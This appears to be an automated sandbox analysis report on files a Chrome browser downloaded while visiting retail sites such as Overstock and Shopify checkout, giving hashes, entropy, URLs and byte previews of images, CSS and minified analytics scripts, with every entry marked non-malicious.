                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/collections/Cabot-60W-L-Desk-with-Hutch_2C-Cabinet-and-Bookcase-by-Bush-Furniture.jpg?v=1713207166&width=250
                                                                                                                                                                                    Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@..................!.......$..............8iinf..........infe........av01.....infe........Exif.....iprp....ipco....colrrICC....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.............av1C........ispe................pixi............ipma...................iref........cdsc........".mdat.......~Y !..2.C.....A. .."..#.C...I.Hd...r.@1...R..B....V$...O.......qruy...!...f...&,..{.XNq..;Y......s...e.....I.I...l.w..m.|.8..8.1~fJ).....-...<&.&3K.y.._.q0....8a.._.X..g...m.....:.y..E....5.<..G..u.ox...eD.q.i.p.5R.....:...m....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (8298), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):8298
                                                                                                                                                                                    Entropy (8bit):5.180172095910542
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:KwjyhENneOeca4vfv4ovaRViSpS7lHW2SQdIf6:KWeya4vfQovyV+lHTU6
                                                                                                                                                                                    MD5:125C7F6C7E3F3B32CA1A15AFBBC6935E
                                                                                                                                                                                    SHA1:7066F246643259315FB97D3E85F48F4D471AB27E
                                                                                                                                                                                    SHA-256:61FA9E0A912C675E178777D2B27F6CBD482F8912A6B0AA31FA3515985A8CD626
                                                                                                                                                                                    SHA-512:15768054FE3D5EFEAD6DD96F73D54F3A935DDC246A8D727960371C543CFF923162C7530B8F47C4757F0A1028F9C0961DEE5D9D2FA983AE93434640C32F4A3020
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shopifycloud/shopify/assets/shop_events_listener-61fa9e0a912c675e178777d2b27f6cbd482f8912a6b0aa31fa3515985a8cd626.js
                                                                                                                                                                                    Preview:!function(){var e=function(e){var t={exports:{}};return e.call(t.exports,t,t.exports),t.exports},t=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}return function(t,n,r){return n&&e(t.prototype,n),r&&e(t,r),t}}(),n=function(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")},r=function(e){if(Array.isArray(e)){for(var t=0,n=Array(e.length);t<e.length;t++)n[t]=e[t];return n}return Array.from(e)};e((function(e,a){"use strict";function o(e,t){if(e.length!=t.length)throw Error("Payload body and response have different number of items");e.forEach((function(e,n){var r=1;try{r=parseInt(t[n].quantity,10)||1}catch(e){console&&console.warn&&console.warn("[shop_events_listener] Error in handleBulkItemCartAddResponse: "+e.message)}s(e,r)}))}function i(e,t){for(var n=new Array(t),r=0;r<t;r++)n[r]={};var a=!0,o=!1,i=void 0;try{for(var c,s=dec
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):79
                                                                                                                                                                                    Entropy (8bit):2.716326985350135
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:tQTltaL5UJjV9GjUJjVE:6XG5UJjGjUJj2
                                                                                                                                                                                    MD5:8E3DB10AF5A3E1CABE7AA67674E21188
                                                                                                                                                                                    SHA1:E2314B0038DF2D49DDBE461F33A6797D4586CDE0
                                                                                                                                                                                    SHA-256:87ECD5BABD6FD9F4F6F796D745AA38751FAF3985E3B55F87A2F53E506FE07362
                                                                                                                                                                                    SHA-512:A4F136016F4591E021D54F06141896581371828BF02F662A050B2A36567DFEC6068A4C758815D481E01BD7D68692329B5EE228C854AB2D85246D05B56692FB09
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:[71, 73, 70, 56, 57, 97, 1, 0, 1, 0, 0, 0, 0, 44, 0, 0, 0, 0, 1, 0, 1, 0, 0, 2]
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 650x650, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):133971
                                                                                                                                                                                    Entropy (8bit):7.983518522119968
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:Q0rYU0232ZRA4fm7SAe3q5NRfHs+du69Eu6Ez:JYP2mZR1m+Pq5NVM+YW
                                                                                                                                                                                    MD5:EB7BBD357E2862E931CA50E15A7FBC41
                                                                                                                                                                                    SHA1:627C41D77E1B1708A1C2E49920DABF14C7F695F0
                                                                                                                                                                                    SHA-256:6238931331EDFF7E676A2F670AED36F03DB6BC1B0AFDCFECD9146B534575429C
                                                                                                                                                                                    SHA-512:BDA812D266CB80FA3464BD3944425CE8735B783776C4C6F206B8013DF50312015F226274BAABC8B6B8F4C4BA260EE58D75A5BD2F985A04150ADEF011DE80EBF9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100............................................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}.........................................................................................................P...@.T............B ..P ......P .(. ....P...@..........B...@..................m....5jfi1...1....vu3!v.f..E.....f.n...'.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):83
                                                                                                                                                                                    Entropy (8bit):5.0289819083000395
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:jdJMeXecRmKYE1wcLbklBMvLACv:jdJM3cRDjAs
                                                                                                                                                                                    MD5:0951B3AE1D7C646591AF0A4B13F356EF
                                                                                                                                                                                    SHA1:9972523ED2314A487131F39E48010C02A905B139
                                                                                                                                                                                    SHA-256:6AF0272E00008D3EB784E33F1CAB4D3FDAABE262F6078FF1DD84FD456D21C2A3
                                                                                                                                                                                    SHA-512:1F882A83422D5AE1293BDB6A7BE1A459B1DC4EB6F2EED412C046C15E09BD3097B57C5ABEC71C0DB6B44A771A86220444495591331F5FD25E90542783E2F632DE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/Section.sQehCocD.css
                                                                                                                                                                                    Preview:.WPQk2{color:var(--x-default-color-accent)}.qReyn>button{display:block;width:100%}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):14874
                                                                                                                                                                                    Entropy (8bit):7.946918271081834
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:3C1UB3D72d8v/iF0mQaG9fIKnkbHJ2b0cOhe99lRTkDS:3CADi8v/WbkA9bHo8evlR5
                                                                                                                                                                                    MD5:3A569348603A985074E9AA863ECA99E9
                                                                                                                                                                                    SHA1:6E4A3D0C6B3970E62CA017F13D3827DC71928AE9
                                                                                                                                                                                    SHA-256:75B2D8F4D4D4ECB956BA80B56799A4874DCA552D43F984493CBE1E616BAA25F7
                                                                                                                                                                                    SHA-512:CA4E2EA647C63F5970994100FA8198471CAB209452BA9EC9E13207B9E222AE1ECA7F82B777FCB635B4D9FD0F45099030A475C0CA8B5E427EFD3C7B99AEBFF26D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/collections/Auriya-14k-Gold-1ctw-Oval-Moissanite-Halo-Diamond-Engagement-Ring-1-5ctw.jpg?v=1710950215&width=320
                                                                                                                                                                                    Preview:RIFF.:..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .7.......*@.@.>9..D"!.$..)...cn.6[....D.]...-."=..g_..~...#.....<........3....}....l.Y..~........'......._............y.....A.......?.........@?.z.vu./.G...........6.w.?s.C.G..._.O.O,.......w......w.....}..w..../......?.G......7.i......!?y..........._..I.....!...'.o........=...........}.?..j.........F..09....Fc.....).Y.....p..r.M..X.;...-.2..Z5WM....B......].kW...)...;....KT.....6;..C.M.....*.........v.Zih......c..?... I..<..JU$~o_..........-.].?...w...........r...QW..a{.X......r.G{.z.<E...z...Oz.a..c.<~
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (23487), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):23487
                                                                                                                                                                                    Entropy (8bit):5.145866643302827
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:8O6kdkRxaGYYasNLf9QMkOZWX4OyBtdCbcM0RKwtWYnxkZjw:8O6k+xXjLf9syJdGcZEwtWYnxkZjw
                                                                                                                                                                                    MD5:7C0F2E193E2413FEF62F1E62FBAB9B94
                                                                                                                                                                                    SHA1:02FFB0069243CE265E8CCB398E08F8F872469BC4
                                                                                                                                                                                    SHA-256:AC25781BCCDC051A8E6945ECDF68922E04E7F75154CC857371461ECFE1111815
                                                                                                                                                                                    SHA-512:113B0E742CE3C1CAF13058E0CE6160510B56AA18ED7E0751A47AE0228E3D9AAA1064448CB0FB842872076A0B1DB3EACA96592FED8434BD36072A6446AB0CF49F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/search-nav.guided-nav.ac25781bccdc051a8e6945ecdf68922e04e7f75154cc857371461ecfe1111815.js
                                                                                                                                                                                    Preview:!function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var o in t)n.d(r,o,function(e){return t[e]}.bind(null,o));return r},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=361)}({152:function(t,e){!function(){if("function"==typeof window.CustomEvent)return!1;window
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (52360)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):349823
                                                                                                                                                                                    Entropy (8bit):5.4181183321056725
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:8JV0gSqdzJ3IZoOkn+gs29IlIoL+kyqAfN+Th3dFTUOQeyePEMuDZjUX1YkE/L4F:8JV06+gs29UIoL+kFAfg9dFTU9ecu/
                                                                                                                                                                                    MD5:67F88B2D9812BB2687A28FF0FAD579D6
                                                                                                                                                                                    SHA1:EE940479B2456259831C880B80406E5099D8C434
                                                                                                                                                                                    SHA-256:15BB0889AD69CBC01DCE2D9A2DF36BE01B6AE97E0E57510DCA89A56D095BF0D5
                                                                                                                                                                                    SHA-512:403D726407F12132003D6AF1743A5B5CC682D520F6D637DF4EFC8708BDAB5B7B153444D06175E33A540152101DC957CECE23C909E7EB89E1DDB973DAB3A21F75
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){"use strict";function t(){t=function(){return e};var e={},r=Object.prototype,n=r.hasOwnProperty,o="function"==typeof Symbol?Symbol:{},i=o.iterator||"@@iterator",a=o.asyncIterator||"@@asyncIterator",c=o.toStringTag||"@@toStringTag";function u(t,e,r){return Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{u({},"")}catch(t){u=function(t,e,r){return t[e]=r}}function l(t,e,r,n){var o=e&&e.prototype instanceof p?e:p,i=Object.create(o.prototype),a=new I(n||[]);return i._invoke=function(t,e,r){var n="suspendedStart";return function(o,i){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===o)throw i;return T()}for(r.method=o,r.arg=i;;){var a=r.delegate;if(a){var c=g(a,r);if(c){if(c===s)continue;return c}}if("next"===r.method)r.sent=r._sent=r.arg;else if("throw"===r.method){if("suspendedStart"===n)throw n="completed",r.arg;r.dispatchException(r.arg)}else"return"===r.method&&r.abrupt("return",r.arg);
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 87a, 1 x 1
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):36
                                                                                                                                                                                    Entropy (8bit):3.0708241287951763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:M3VllRCXk6pswn:ElakCsw
                                                                                                                                                                                    MD5:F729966732570537B1F59424F6F06755
                                                                                                                                                                                    SHA1:EEA047C3C30C3C5AFF350D10B0EBE35802C56528
                                                                                                                                                                                    SHA-256:130B6263E0272B64DB46C42CB3DA57F47CED7317289CE3B0658A5568178CD5EC
                                                                                                                                                                                    SHA-512:A0321512172336B4E759801AFE99AE30BFB278458BBE2E8BD13D8E168962C055FA48E1FA255C7AFD0CC88DD61B564B57B5240F76EF70CE99C22C3B2F2615289F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.bedbathandbeyond.com/dlp?cci=FJPCB3QZ55B3SY2PLDXUPTXKCY&a=1&x=1280&y=1024&_=1730294599033
                                                                                                                                                                                    Preview:GIF87a.............,...........L..;.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, Unicode text, UTF-8 text, with very long lines (6825)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):6828
                                                                                                                                                                                    Entropy (8bit):5.287195105875283
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:4QETQVhtptTK/bZ6vJ1t8S2nU4qe6xq17cwqz5LflU:4QETQVhVTKgwnqhxC7cwqTU
                                                                                                                                                                                    MD5:D203E1FFFCFA48846B09CD7AD4FF0E86
                                                                                                                                                                                    SHA1:653FE82DBCB2FFA463A2307D580C99537CFC938F
                                                                                                                                                                                    SHA-256:5FCCB6179FF4FFD606C30DBE452C54368D2B14A1CFA92D4E59A7DFD97E9EDD6F
                                                                                                                                                                                    SHA-512:4EC9BDFA36C04232E107322EF1D27FF7E097E5DEEC6D16377005C350ECBABD8DED9117B84CC585B71E49F333DC68406EEB37A9FA0722F5B2C53D280AF12CB76E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/context.C2MjukUF.js
                                                                                                                                                                                    Preview:import{eJ as M,lN as k,at as B,c0 as m,cx as c,p9 as A,hS as h,pa as T,pb as V,T as _,pc as N,pd as C,lW as O,lX as q,lP as U,hX as j,a as F,bt as x,jf as w,e as v,eQ as Y,dE as G,d3 as H,f4 as z,iM as R,hR as S,ms as L,pe as J,iP as W,dt as X,q as D,iK as $,dD as K,dO as Q,pf as Z,pg as ee,dw as te,hE as ne,dv as se,ib as ae,cK as re,d as y,J as ie,eW as oe,A as de,cM as I,y as E,mk as le,gj as ue}from"./app.DfgMZONA.js";const Ie=()=>{const e=M(),t=k(),n=B().paymentLines.value,s=m(c.userStoredPaymentMethods),r=m(c.selectedPaymentMethod);if(e)return t?.payment?pe(r,s):ce(n)},ce=e=>{if(e?.length)return A(e)?"IDEAL":"CREDIT_CARD"},pe=(e,t)=>{if(!(!e&&!t.length))return e&&h(e)||T(t)?"IDEAL":"CREDIT_CARD"},Ee=()=>{const e=V();return _(()=>e===N.ShopPayExternal?C.ShopPayExternal:C.CheckoutOne,[e])};function ge(){const e=M(),t=O(),n=q(),s=U(["CUSTOM","STORE_CREDIT"]);return!e||t||n||s}function Me({children:e,closeButton:t,...n}){const r=j()?"fill":void 0;return F(x,{blockSize:r,size:"auto",.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1339), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1339
                                                                                                                                                                                    Entropy (8bit):5.229001559788375
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:2QLmRWeyVLx7gE+oxFrHXNlDLDOLQOTjy88oqEFsGdKcR0sqRWZGKjRF2VFkZXy0:6ELxEEzxFrHzMSWqssGdR0sqw0Aj2vkJ
                                                                                                                                                                                    MD5:956F63A2A49369D5F5244CF8AD04D0BE
                                                                                                                                                                                    SHA1:1BE07A341EB069FF011FF4364069F30780186798
                                                                                                                                                                                    SHA-256:70E2780960DA0799B00EE4AD9FC7388B87E24D8617548EBBDC301818BE8E877F
                                                                                                                                                                                    SHA-512:3239E1C08CCA30333BDD8D6B2EE1D2077B5805E68B844F29F166586E19C558F266C5589C741AFB72B26F31A334C2C8EEDD1B029E0B4ECC4038F2EF5EBCF38A2C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(){const e=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(e){return}function t(){var e=null;if(window.braze!==undefined){e=window.braze}else if(window.appboy!==undefined){e=window.appboy}return e}const l="reconciledCheckouts";var s=null;const c=JSON.parse(localStorage.getItem("__ui"));if(c!=null&&typeof c=="object"&&c.length>2){if(c[2]!=null&&typeof c[2]=="object"&&typeof c[2][0]=="object"){s=c[2][0]["checkoutSessionIdentifier"]}}if(s==null){return}t().getDeviceId(function(e){var t=e;if(t==null){console.warn(`Cannot reconcile checkout ${s} because Braze device ID cannot be obtained`)}else{const c=JSON.parse(localStorage.getItem(l)||"{}");const n=c[s]||null;if(n==t){return}else{c[s]=t;localStorage.setItem(l,JSON.stringify(c))}const o=new URL([...document.getElementsByTagName("script")].map(e=>e.src).find(e=>e.includes("braze-checkout-script")));const i=new URLSearchParams(o.search);const r=Object.fromEntries(i.entries());fetch("https://"+r["sdk_url"]+`/a
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):20405
                                                                                                                                                                                    Entropy (8bit):7.938010604921575
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:NEIyd2Xn8ED/dzbE+BXekYDi2vzxCBGSNSuAvH8s5P84AJyMeP:cd2Xn8ED/RE+BuTD/vz6GqSuA/8sGJyf
                                                                                                                                                                                    MD5:DC0294E7D4A6857E3B8CBFE6F6752139
                                                                                                                                                                                    SHA1:BBCD4B3EF8DDC57E8F8A65F2846A853BE6960B52
                                                                                                                                                                                    SHA-256:1967879295CA9C166BAEE0EFB9DB6175EA9299EBB34174A3BDA8D88D0648E513
                                                                                                                                                                                    SHA-512:7C25EFAE18D86EE51957683F58E46B7AB8E1A0A9176E6215CDE1D355CAD82385E02EEB93DC6678ABC1A8E57268CA8A9C209716933EF963F1269888801EC41469
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@...................................................................................^i.8*Y9xK:Q....a.....@A.Q.P...C....4.;G".!.0. ...40....!.a.).. .....!.Q.N.....TA...KH. ..F.....'..... .h..!.....H.........M...J...!.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1788
                                                                                                                                                                                    Entropy (8bit):6.983785098251631
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:qIl/XflxLuJwxkGFvB5Z65vjLajkFs9p9DweM4r5tOgd9NTra+A:qIl/XZxkG12PykFsH9jM4t5ad
                                                                                                                                                                                    MD5:B9EEB497E4506884BAE2C1D653B891BA
                                                                                                                                                                                    SHA1:E5B4AA6A214E27F29049B36663BC163C37306711
                                                                                                                                                                                    SHA-256:AC86362E02C077E5C710DEE47A85616D9FABFFD8DB43875B0B1A864C3AD2BAE2
                                                                                                                                                                                    SHA-512:4903FE4CA904F7F0E95094B68A09130F34A2585EF371A7B6E55411BA0DAC541BAB8ED64A9D3EE8A8FF2FDFE1827E050DF3BCE3EF3B4984773BD1297AC979779D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_499a3c59-8d8d-465f-b003-60d34b02dac0.jpg?v=1729323123&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 d........*P.P.>-..B........bY.1.*.~..w.u......m...b....4.k...^..=...p..2../...Y.v.?.*..pg...[]..^~..;.wH..EfS.x./..V.Y.....c;|S.'.....r..wp{6o..l...`.a.q8...x...hoc......v..3..........Kn.....I..?M..@h5}.8......G[.P.5M..5?.>..'(..f....G..dV7....zsmv..].E@.`.........!.j+....=.(O..6.....w..~.a3d\u.4.....5../.!......u0...f&......5...a..2P%|/o.D..#.g..._.W.?.7......hYybZg."Q.\...k.lDW.>...Q.[..I.5..!...HQ..9.)...mE.v-V..?rI...Uy$...P...}.;..N.H.5...g.a...J.9..mz?..@..&.r.?...8[..c.G.. .{).q...j..w....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):32
                                                                                                                                                                                    Entropy (8bit):3.952819531114783
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:3I5K0G2C2Y:cK2O
                                                                                                                                                                                    MD5:B61BDD1D07BB3EBE842D3BD8DDAA4C7D
                                                                                                                                                                                    SHA1:699AA5481743F9BCA528B5B4A98A3779C24E4D5F
                                                                                                                                                                                    SHA-256:3E96D14F41DAF50953EC34B9A8C47D242F9E1A41A21302FADBB9F215BD379E56
                                                                                                                                                                                    SHA-512:FB30E985EA990654390D6E2D00B2E3A7CB025A97264B30EBC508E105A8B1795087CAA8F839DAEF0F044BE0C1CE7268E3F9FA5693D9B8BEF555B687DFB07AF58C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAlsZl8VA6ASORIFDa2Eoww=?alt=proto
                                                                                                                                                                                    Preview:ChQKEg2thKMMGgQICRgBGgUImgEYAg==
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4717), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4717
                                                                                                                                                                                    Entropy (8bit):5.0231454692467095
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:x9yTUdsZTmzDXHyHkz/93yN1X6VA/+fO/HYU1:nyTUCSDHyHW/93yNtmAm2/N
                                                                                                                                                                                    MD5:9A39012D8B21FD48BC886557A71DE05B
                                                                                                                                                                                    SHA1:0513D36ADD1A40C327DCEDBF6740400143BDF3E7
                                                                                                                                                                                    SHA-256:2432D4D714F569FB026AC1272B385CC0C13A5C820AB4AE88E907B4DCC13C8F9D
                                                                                                                                                                                    SHA-512:BA6D35BDDF90FF260C3388C247EF6ED9F97938471F2D6FBF97E741FC5809B7FAECACA6454958AC4DE21459CFF2A6C6A8E52EE4EAF4915198F4264F7F14C1C8FC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(){const e=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(e){return}const t=new URL([...document.getElementsByTagName("script")].map(e=>e.src).find(e=>e.includes("braze-web-sdk-script")));const s=new URLSearchParams(t.search);const r=Object.fromEntries(s.entries());if(!document.querySelector("script[src*='braze.min.js']")&&!document.querySelector("script[src*='braze.no-amd.min.js']")&&!document.querySelector("script[src*='appboy.min.js']")&&!document.querySelector("script[src*='appboy.no-amd.min.js']")&&!window.braze&&!window.appboy){+function(e,t,s,r,o){e.braze={};e.brazeQueue=[];for(var n="BrazeSdkMetadata DeviceProperties Card Card.prototype.dismissCard Card.prototype.removeAllSubscriptions Card.prototype.removeSubscription Card.prototype.subscribeToClickedEvent Card.prototype.subscribeToDismissedEvent Card.fromContentCardsJson ImageOnly CaptionedImage ClassicCard ControlCard ContentCards ContentCards.prototype.getUnviewedCardCount Feed Feed.prototyp
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (862), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):862
                                                                                                                                                                                    Entropy (8bit):5.599816802598562
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:hnMQbwuOaxyCkv4AEHaOaiAA+eTnVK0xcTiUv2YwasqQv5DFQQ9BWdvWyAzDIxd/:hMiRO9nOaSpVK0x0DsqQV2vWrDIzbqI
                                                                                                                                                                                    MD5:C3EB7959D9BBAB37768E0EE4E2E9E19B
                                                                                                                                                                                    SHA1:F62E0F2AFC2A3F209EA4CBECF9C6A4AC3C9193C0
                                                                                                                                                                                    SHA-256:90DA71766FEC4B3D0F045AD52DD4EDA376DDFCE2CB13BFBD33ECF8EF969CF5C6
                                                                                                                                                                                    SHA-512:AD554C1A58793D688E30E561C23BF67CE217FBD94FF0A22770FACFE3F3AC93AD424D1AAF7B5AA195A87B185D88E84877E625AB85BAF3E2C1A6FC4405EEED72AD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
